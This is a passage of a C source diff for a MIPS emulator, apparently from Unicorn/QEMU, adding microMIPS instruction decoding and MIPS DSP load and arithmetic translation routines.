case NMSUB_PS: + mips32_op = OPC_NMSUB_PS; + do_madd: + gen_flt3_arith(ctx, mips32_op, rd, rr, rs, rt); + break; + case CABS_COND_FMT: + cond = (ctx->opcode >> 6) & 0xf; + cc = (ctx->opcode >> 13) & 0x7; + fmt = (ctx->opcode >> 10) & 0x3; + switch (fmt) { + case 0x0: + gen_cmpabs_s(ctx, cond, rt, rs, cc); + break; + case 0x1: + gen_cmpabs_d(ctx, cond, rt, rs, cc); + break; + case 0x2: + gen_cmpabs_ps(ctx, cond, rt, rs, cc); + break; + default: + goto pool32f_invalid; + } + break; + case C_COND_FMT: + cond = (ctx->opcode >> 6) & 0xf; + cc = (ctx->opcode >> 13) & 0x7; + fmt = (ctx->opcode >> 10) & 0x3; + switch (fmt) { + case 0x0: + gen_cmp_s(ctx, cond, rt, rs, cc); + break; + case 0x1: + gen_cmp_d(ctx, cond, rt, rs, cc); + break; + case 0x2: + gen_cmp_ps(ctx, cond, rt, rs, cc); + break; + default: + goto pool32f_invalid; + } + break; + case POOL32FXF: + gen_pool32fxf(ctx, rt, rs); + break; + case 0x00: + /* PLL foo */ + switch ((ctx->opcode >> 6) & 0x7) { + case PLL_PS: + mips32_op = OPC_PLL_PS; + goto do_ps; + case PLU_PS: + mips32_op = OPC_PLU_PS; + goto do_ps; + case PUL_PS: + mips32_op = OPC_PUL_PS; + goto do_ps; + case PUU_PS: + mips32_op = OPC_PUU_PS; + goto do_ps; + case CVT_PS_S: + mips32_op = OPC_CVT_PS_S; + do_ps: + gen_farith(ctx, mips32_op, rt, rs, rd, 0); + break; + default: + goto pool32f_invalid; + } + break; + case 0x08: + /* [LS][WDU]XC1 */ + switch ((ctx->opcode >> 6) & 0x7) { + case LWXC1: + mips32_op = OPC_LWXC1; + goto do_ldst_cp1; + case SWXC1: + mips32_op = OPC_SWXC1; + goto do_ldst_cp1; + case LDXC1: + mips32_op = OPC_LDXC1; + goto do_ldst_cp1; + case SDXC1: + mips32_op = OPC_SDXC1; + goto do_ldst_cp1; + case LUXC1: + mips32_op = OPC_LUXC1; + goto do_ldst_cp1; + case SUXC1: + mips32_op = OPC_SUXC1; + do_ldst_cp1: + gen_flt3_ldst(ctx, mips32_op, rd, rd, rt, rs); + break; + default: + goto pool32f_invalid; + } + break; + case 0x18: + /* 3D insns */ + fmt = (ctx->opcode >> 9) & 0x3; + switch ((ctx->opcode >> 6) & 0x7) { + case RSQRT2_FMT: + switch (fmt) { + case FMT_SDPS_S: + mips32_op = OPC_RSQRT2_S; + goto do_3d; + case FMT_SDPS_D: + mips32_op = OPC_RSQRT2_D; + goto do_3d; + case FMT_SDPS_PS: + mips32_op = OPC_RSQRT2_PS; + goto do_3d; + default: + goto pool32f_invalid; + } + break; + case RECIP2_FMT: + switch (fmt) { + case FMT_SDPS_S: + mips32_op = OPC_RECIP2_S; + goto do_3d; + case FMT_SDPS_D: + mips32_op = OPC_RECIP2_D; + goto do_3d; + case FMT_SDPS_PS: + mips32_op = OPC_RECIP2_PS; + goto do_3d; + default: + goto pool32f_invalid; + } + break; + case ADDR_PS: + mips32_op = OPC_ADDR_PS; + goto do_3d; + case MULR_PS: + mips32_op = OPC_MULR_PS; + do_3d: + gen_farith(ctx, mips32_op, rt, rs, rd, 0); + break; + default: + goto pool32f_invalid; + } + break; + case 0x20: + /* MOV[FT].fmt and PREFX */ + cc = (ctx->opcode >> 13) & 0x7; + fmt = (ctx->opcode >> 9) & 0x3; + switch ((ctx->opcode >> 6) & 0x7) { + case MOVF_FMT: + switch (fmt) { + case FMT_SDPS_S: + gen_movcf_s(ctx, rs, rt, cc, 0); + break; + case FMT_SDPS_D: + gen_movcf_d(ctx, rs, rt, cc, 0); + break; + case FMT_SDPS_PS: + gen_movcf_ps(ctx, rs, rt, cc, 0); + break; + default: + goto pool32f_invalid; + } + break; + case MOVT_FMT: + switch (fmt) { + case FMT_SDPS_S: + gen_movcf_s(ctx, rs, rt, cc, 1); + break; + case FMT_SDPS_D: + gen_movcf_d(ctx, rs, rt, cc, 1); + break; + case FMT_SDPS_PS: + gen_movcf_ps(ctx, rs, rt, cc, 1); + break; + default: + goto pool32f_invalid; + } + break; + case PREFX: + break; + default: + goto pool32f_invalid; + } + break; +#define FINSN_3ARG_SDPS(prfx) \ + switch ((ctx->opcode >> 8) & 0x3) { \ + case FMT_SDPS_S: \ + mips32_op = OPC_##prfx##_S; \ + goto do_fpop; \ + case FMT_SDPS_D: \ + mips32_op = OPC_##prfx##_D; \ + goto do_fpop; \ + case FMT_SDPS_PS: \ + mips32_op = OPC_##prfx##_PS; \ + goto do_fpop; \ + default: \ + goto pool32f_invalid; \ + } + case 0x30: + /* regular FP ops */ + switch ((ctx->opcode >> 6) & 0x3) { + case ADD_FMT: + FINSN_3ARG_SDPS(ADD); + break; + case SUB_FMT: + FINSN_3ARG_SDPS(SUB); + break; + case MUL_FMT: + FINSN_3ARG_SDPS(MUL); + break; + case DIV_FMT: + fmt = (ctx->opcode >> 8) & 0x3; + if (fmt == 1) { + mips32_op = OPC_DIV_D; + } else if (fmt == 0) { + mips32_op = OPC_DIV_S; + } else { + goto pool32f_invalid; + } + goto do_fpop; + default: + goto pool32f_invalid; + } + break; + case 0x38: + /* cmovs */ + switch ((ctx->opcode >> 6) & 0x3) { + case MOVN_FMT: + FINSN_3ARG_SDPS(MOVN); + break; + case MOVZ_FMT: + FINSN_3ARG_SDPS(MOVZ); + break; + default: + goto pool32f_invalid; + } + break; + do_fpop: + gen_farith(ctx, mips32_op, rt, rs, rd, 0); + break; + default: + pool32f_invalid: + MIPS_INVAL("pool32f"); + generate_exception(ctx, EXCP_RI); + break; + } + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + case POOL32I: + minor = (ctx->opcode >> 21) & 0x1f; + switch (minor) { + case BLTZ: + gen_compute_branch(ctx, OPC_BLTZ, 4, rs, -1, imm << 1, 4); + break; + case BLTZAL: + gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BLTZALS: + gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BGEZ: + gen_compute_branch(ctx, OPC_BGEZ, 4, rs, -1, imm << 1, 4); + break; + case BGEZAL: + gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BGEZALS: + gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BLEZ: + gen_compute_branch(ctx, OPC_BLEZ, 4, rs, -1, imm << 1, 4); + break; + case BGTZ: + gen_compute_branch(ctx, OPC_BGTZ, 4, rs, -1, imm << 1, 4); + break; + + /* Traps */ + case TLTI: + mips32_op = OPC_TLTI; + goto do_trapi; + case TGEI: + mips32_op = OPC_TGEI; + goto do_trapi; + case TLTIU: + mips32_op = OPC_TLTIU; + goto do_trapi; + case TGEIU: + mips32_op = OPC_TGEIU; + goto do_trapi; + case TNEI: + mips32_op = OPC_TNEI; + goto do_trapi; + case TEQI: + mips32_op = OPC_TEQI; + do_trapi: + gen_trap(ctx, mips32_op, rs, -1, imm); + break; + + case BNEZC: + case BEQZC: + gen_compute_branch(ctx, minor == BNEZC ? OPC_BNE : OPC_BEQ, + 4, rs, 0, imm << 1, 0); + /* Compact branches don't have a delay slot, so just let + the normal delay slot handling take us to the branch + target. */ + break; + case LUI: + gen_logic_imm(ctx, OPC_LUI, rs, -1, imm); + break; + case SYNCI: + /* Break the TB to be able to sync copied instructions + immediately */ + ctx->bstate = BS_STOP; + break; + case BC2F: + case BC2T: + /* COP2: Not implemented. */ + generate_exception_err(ctx, EXCP_CpU, 2); + break; + case BC1F: + mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1FANY2 : OPC_BC1F; + goto do_cp1branch; + case BC1T: + mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1TANY2 : OPC_BC1T; + goto do_cp1branch; + case BC1ANY4F: + mips32_op = OPC_BC1FANY4; + goto do_cp1mips3d; + case BC1ANY4T: + mips32_op = OPC_BC1TANY4; + do_cp1mips3d: + check_cop1x(ctx); + check_insn(ctx, ASE_MIPS3D); + /* Fall through */ + do_cp1branch: + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + gen_compute_branch1(ctx, mips32_op, + (ctx->opcode >> 18) & 0x7, imm << 1); + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + case BPOSGE64: + case BPOSGE32: + /* MIPS DSP: not implemented */ + /* Fall through */ + default: + MIPS_INVAL("pool32i"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case POOL32C: + minor = (ctx->opcode >> 12) & 0xf; + switch (minor) { + case LWL: + mips32_op = OPC_LWL; + goto do_ld_lr; + case SWL: + mips32_op = OPC_SWL; + goto do_st_lr; + case LWR: + mips32_op = OPC_LWR; + goto do_ld_lr; + case SWR: + mips32_op = OPC_SWR; + goto do_st_lr; +#if defined(TARGET_MIPS64) + case LDL: + mips32_op = OPC_LDL; + goto do_ld_lr; + case SDL: + mips32_op = OPC_SDL; + goto do_st_lr; + case LDR: + mips32_op = OPC_LDR; + goto do_ld_lr; + case SDR: + mips32_op = OPC_SDR; + goto do_st_lr; + case LWU: + mips32_op = OPC_LWU; + goto do_ld_lr; + case LLD: + mips32_op = OPC_LLD; + goto do_ld_lr; +#endif + case LL: + mips32_op = OPC_LL; + goto do_ld_lr; + do_ld_lr: + gen_ld(ctx, mips32_op, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + do_st_lr: + gen_st(ctx, mips32_op, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + case SC: + gen_st_cond(ctx, OPC_SC, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; +#if defined(TARGET_MIPS64) + case SCD: + gen_st_cond(ctx, OPC_SCD, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; +#endif + case PREF: + /* Treat as no-op */ + break; + default: + MIPS_INVAL("pool32c"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case ADDI32: + mips32_op = OPC_ADDI; + goto do_addi; + case ADDIU32: + mips32_op = OPC_ADDIU; + do_addi: + gen_arith_imm(ctx, mips32_op, rt, rs, imm); + break; + + /* Logical operations */ + case ORI32: + mips32_op = OPC_ORI; + goto do_logici; + case XORI32: + mips32_op = OPC_XORI; + goto do_logici; + case ANDI32: + mips32_op = OPC_ANDI; + do_logici: + gen_logic_imm(ctx, mips32_op, rt, rs, imm); + break; + + /* Set less than immediate */ + case SLTI32: + mips32_op = OPC_SLTI; + goto do_slti; + case SLTIU32: + mips32_op = OPC_SLTIU; + do_slti: + gen_slt_imm(ctx, mips32_op, rt, rs, imm); + break; + case JALX32: + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; + gen_compute_branch(ctx, OPC_JALX, 4, rt, rs, offset, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case JALS32: + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 1; + gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, offset, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BEQ32: + gen_compute_branch(ctx, OPC_BEQ, 4, rt, rs, imm << 1, 4); + break; + case BNE32: + gen_compute_branch(ctx, OPC_BNE, 4, rt, rs, imm << 1, 4); + break; + case J32: + gen_compute_branch(ctx, OPC_J, 4, rt, rs, + (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); + break; + case JAL32: + gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, + (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + /* Floating point (COP1) */ + case LWC132: + mips32_op = OPC_LWC1; + goto do_cop1; + case LDC132: + mips32_op = OPC_LDC1; + goto do_cop1; + case SWC132: + mips32_op = OPC_SWC1; + goto do_cop1; + case SDC132: + mips32_op = OPC_SDC1; + do_cop1: + gen_cop1_ldst(ctx, mips32_op, rt, rs, imm); + break; + case ADDIUPC: + { + int reg = mmreg(ZIMM(ctx->opcode, 23, 3)); + int offset = SIMM(ctx->opcode, 0, 23) << 2; + + gen_addiupc(ctx, reg, offset, 0, 0); + } + break; + /* Loads and stores */ + case LB32: + mips32_op = OPC_LB; + goto do_ld; + case LBU32: + mips32_op = OPC_LBU; + goto do_ld; + case LH32: + mips32_op = OPC_LH; + goto do_ld; + case LHU32: + mips32_op = OPC_LHU; + goto do_ld; + case LW32: + mips32_op = OPC_LW; + goto do_ld; +#ifdef TARGET_MIPS64 + case LD32: + mips32_op = OPC_LD; + goto do_ld; + case SD32: + mips32_op = OPC_SD; + goto do_st; +#endif + case SB32: + mips32_op = OPC_SB; + goto do_st; + case SH32: + mips32_op = OPC_SH; + goto do_st; + case SW32: + mips32_op = OPC_SW; + goto do_st; + do_ld: + gen_ld(ctx, mips32_op, rt, rs, imm); + break; + do_st: + gen_st(ctx, mips32_op, rt, rs, imm); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } +} + +static int decode_micromips_opc (CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + uint32_t op; + + /* make sure instructions are on a halfword boundary */ + if (ctx->pc & 0x1) { + env->CP0_BadVAddr = ctx->pc; + generate_exception(ctx, EXCP_AdEL); + ctx->bstate = BS_STOP; + return 2; + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, ctx->pc)) { + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_CODE_IDX, env->uc, ctx->pc); + *insn_need_patch = true; + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + op = (ctx->opcode >> 10) & 0x3f; + /* Enforce properly-sized instructions in a delay slot */ + if (ctx->hflags & MIPS_HFLAG_BDS_STRICT) { + switch (op & 0x7) { /* MSB-3..MSB-5 */ + case 0: + /* POOL32A, POOL32B, POOL32I, POOL32C */ + case 4: + /* ADDI32, ADDIU32, ORI32, XORI32, SLTI32, SLTIU32, ANDI32, JALX32 */ + case 5: + /* LBU32, LHU32, POOL32F, JALS32, BEQ32, BNE32, J32, JAL32 */ + case 6: + /* SB32, SH32, ADDIUPC, SWC132, SDC132, SW32 */ + case 7: + /* LB32, LH32, LWC132, LDC132, LW32 */ + if (ctx->hflags & MIPS_HFLAG_BDS16) { + generate_exception(ctx, EXCP_RI); + /* Just stop translation; the user is confused. */ + ctx->bstate = BS_STOP; + return 2; + } + break; + case 1: + /* POOL16A, POOL16B, POOL16C, LWGP16, POOL16F */ + case 2: + /* LBU16, LHU16, LWSP16, LW16, SB16, SH16, SWSP16, SW16 */ + case 3: + /* MOVE16, ANDI16, POOL16D, POOL16E, BEQZ16, BNEZ16, B16, LI16 */ + if (ctx->hflags & MIPS_HFLAG_BDS32) { + generate_exception(ctx, EXCP_RI); + /* Just stop translation; the user is confused. */ + ctx->bstate = BS_STOP; + return 2; + } + break; + } + } + + switch (op) { + case POOL16A: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs1 = mmreg(uMIPS_RS1(ctx->opcode)); + int rs2 = mmreg(uMIPS_RS2(ctx->opcode)); + uint32_t opc = 0; + + switch (ctx->opcode & 0x1) { + case ADDU16: + opc = OPC_ADDU; + break; + case SUBU16: + opc = OPC_SUBU; + break; + } + + gen_arith(ctx, opc, rd, rs1, rs2); + } + break; + case POOL16B: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs = mmreg(uMIPS_RS(ctx->opcode)); + int amount = (ctx->opcode >> 1) & 0x7; + uint32_t opc = 0; + amount = amount == 0 ? 8 : amount; + + switch (ctx->opcode & 0x1) { + case SLL16: + opc = OPC_SLL; + break; + case SRL16: + opc = OPC_SRL; + break; + } + + gen_shift_imm(ctx, opc, rd, rs, amount); + } + break; + case POOL16C: + gen_pool16c_insn(ctx); + break; + case LWGP16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = 28; /* GP */ + int16_t offset = SIMM(ctx->opcode, 0, 7) << 2; + + gen_ld(ctx, OPC_LW, rd, rb, offset); + } + break; + case POOL16F: + if (ctx->opcode & 1) { + generate_exception(ctx, EXCP_RI); + } else { + /* MOVEP */ + int enc_dest = uMIPS_RD(ctx->opcode); + int enc_rt = uMIPS_RS2(ctx->opcode); + int enc_rs = uMIPS_RS1(ctx->opcode); + int rd, rs, re, rt; + static const int rd_enc[] = { 5, 5, 6, 4, 4, 4, 4, 4 }; + static const int re_enc[] = { 6, 7, 7, 21, 22, 5, 6, 7 }; + static const int rs_rt_enc[] = { 0, 17, 2, 3, 16, 18, 19, 20 }; + + rd = rd_enc[enc_dest]; + re = re_enc[enc_dest]; + rs = rs_rt_enc[enc_rs]; + rt = rs_rt_enc[enc_rt]; + + gen_arith_imm(ctx, OPC_ADDIU, rd, rs, 0); + gen_arith_imm(ctx, OPC_ADDIU, re, rt, 0); + } + break; + case LBU16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4); + offset = (offset == 0xf ? -1 : offset); + + gen_ld(ctx, OPC_LBU, rd, rb, offset); + } + break; + case LHU16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; + + gen_ld(ctx, OPC_LHU, rd, rb, offset); + } + break; + case LWSP16: + { + int rd = (ctx->opcode >> 5) & 0x1f; + int rb = 29; /* SP */ + int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; + + gen_ld(ctx, OPC_LW, rd, rb, offset); + } + break; + case LW16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; + + gen_ld(ctx, OPC_LW, rd, rb, offset); + } + break; + case SB16: + { + int rd = mmreg2(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4); + + gen_st(ctx, OPC_SB, rd, rb, offset); + } + break; + case SH16: + { + int rd = mmreg2(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; + + gen_st(ctx, OPC_SH, rd, rb, offset); + } + break; + case SWSP16: + { + int rd = (ctx->opcode >> 5) & 0x1f; + int rb = 29; /* SP */ + int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; + + gen_st(ctx, OPC_SW, rd, rb, offset); + } + break; + case SW16: + { + int rd = mmreg2(uMIPS_RD(ctx->opcode)); + int rb = mmreg(uMIPS_RS(ctx->opcode)); + int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; + + gen_st(ctx, OPC_SW, rd, rb, offset); + } + break; + case MOVE16: + { + int rd = uMIPS_RD5(ctx->opcode); + int rs = uMIPS_RS5(ctx->opcode); + + gen_arith_imm(ctx, OPC_ADDIU, rd, rs, 0); + } + break; + case ANDI16: + gen_andi16(ctx); + break; + case POOL16D: + switch (ctx->opcode & 0x1) { + case ADDIUS5: + gen_addius5(ctx); + break; + case ADDIUSP: + gen_addiusp(ctx); + break; + } + break; + case POOL16E: + switch (ctx->opcode & 0x1) { + case ADDIUR2: + gen_addiur2(ctx); + break; + case ADDIUR1SP: + gen_addiur1sp(ctx); + break; + } + break; + case B16: + gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, + SIMM(ctx->opcode, 0, 10) << 1, 4); + break; + case BNEZ16: + case BEQZ16: + gen_compute_branch(ctx, op == BNEZ16 ? OPC_BNE : OPC_BEQ, 2, + mmreg(uMIPS_RD(ctx->opcode)), + 0, SIMM(ctx->opcode, 0, 7) << 1, 4); + break; + case LI16: + { + int reg = mmreg(uMIPS_RD(ctx->opcode)); + int imm = ZIMM(ctx->opcode, 0, 7); + + imm = (imm == 0x7f ? -1 : imm); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[reg], imm); + } + break; + case RES_20: + case RES_28: + case RES_29: + case RES_30: + case RES_31: + case RES_38: + case RES_39: + generate_exception(ctx, EXCP_RI); + break; + default: + decode_micromips32_opc (env, ctx, op); + return 4; + } + + return 2; +} + +/* SmartMIPS extension to MIPS32 */ + +#if defined(TARGET_MIPS64) + +/* MDMX extension to MIPS64 */ + +#endif + +/* MIPSDSP functions. */ +static void gen_mipsdsp_ld(DisasContext *ctx, uint32_t opc, + int rd, int base, int offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "ldx"; + TCGv t0; + + check_dsp(ctx); + t0 = tcg_temp_new(tcg_ctx); + + if (base == 0) { + gen_load_gpr(ctx, t0, offset); + } else if (offset == 0) { + gen_load_gpr(ctx, t0, base); + } else { + gen_op_addr_add(ctx, t0, *cpu_gpr[base], *cpu_gpr[offset]); + } + + switch (opc) { + case OPC_LBUX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_UB); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "lbux"; + break; + case OPC_LHX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESW); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "lhx"; + break; + case OPC_LWX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "lwx"; + break; +#if defined(TARGET_MIPS64) + case OPC_LDX: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t0, rd); + opn = "ldx"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s(%s)", opn, + regnames[rd], regnames[offset], regnames[base]); + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_mipsdsp_arith(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int v1, int v2) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp arith"; + TCGv v1_t; + TCGv v2_t; + + if (ret == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + /* OPC_MULT_G_2E is equal OPC_ADDUH_QB_DSP */ + case OPC_MULT_G_2E: + check_dspr2(ctx); + switch (op2) { + case OPC_ADDUH_QB: + gen_helper_adduh_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDUH_R_QB: + gen_helper_adduh_r_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_PH: + gen_helper_addqh_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_R_PH: + gen_helper_addqh_r_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_W: + gen_helper_addqh_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQH_R_W: + gen_helper_addqh_r_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBUH_QB: + gen_helper_subuh_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBUH_R_QB: + gen_helper_subuh_r_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_PH: + gen_helper_subqh_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_R_PH: + gen_helper_subqh_r_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_W: + gen_helper_subqh_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBQH_R_W: + gen_helper_subqh_r_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + } + break; + case OPC_ABSQ_S_PH_DSP: + switch (op2) { + case OPC_ABSQ_S_QB: + check_dspr2(ctx); + gen_helper_absq_s_qb(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_PH: + check_dsp(ctx); + gen_helper_absq_s_ph(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_W: + check_dsp(ctx); + gen_helper_absq_s_w(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_PRECEQ_W_PHL: + check_dsp(ctx); + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 0xFFFF0000); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + case OPC_PRECEQ_W_PHR: + check_dsp(ctx); + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 0x0000FFFF); + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], 16); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + case OPC_PRECEQU_PH_QBL: + check_dsp(ctx); + gen_helper_precequ_ph_qbl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_PH_QBR: + check_dsp(ctx); + gen_helper_precequ_ph_qbr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_PH_QBLA: + check_dsp(ctx); + gen_helper_precequ_ph_qbla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_PH_QBRA: + check_dsp(ctx); + gen_helper_precequ_ph_qbra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBL: + check_dsp(ctx); + gen_helper_preceu_ph_qbl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBR: + check_dsp(ctx); + gen_helper_preceu_ph_qbr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBLA: + check_dsp(ctx); + gen_helper_preceu_ph_qbla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_PH_QBRA: + check_dsp(ctx); + gen_helper_preceu_ph_qbra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + } + break; + case OPC_ADDU_QB_DSP: + switch (op2) { + case OPC_ADDQ_PH: + check_dsp(ctx); + gen_helper_addq_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_PH: + check_dsp(ctx); + gen_helper_addq_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_W: + check_dsp(ctx); + gen_helper_addq_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_QB: + check_dsp(ctx); + gen_helper_addu_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_QB: + check_dsp(ctx); + gen_helper_addu_s_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_PH: + check_dspr2(ctx); + gen_helper_addu_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_PH: + check_dspr2(ctx); + gen_helper_addu_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_PH: + check_dsp(ctx); + gen_helper_subq_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_PH: + check_dsp(ctx); + gen_helper_subq_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_W: + check_dsp(ctx); + gen_helper_subq_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_QB: + check_dsp(ctx); + gen_helper_subu_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_QB: + check_dsp(ctx); + gen_helper_subu_s_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_PH: + check_dspr2(ctx); + gen_helper_subu_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_PH: + check_dspr2(ctx); + gen_helper_subu_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDSC: + check_dsp(ctx); + gen_helper_addsc(tcg_ctx, *cpu_gpr[ret], 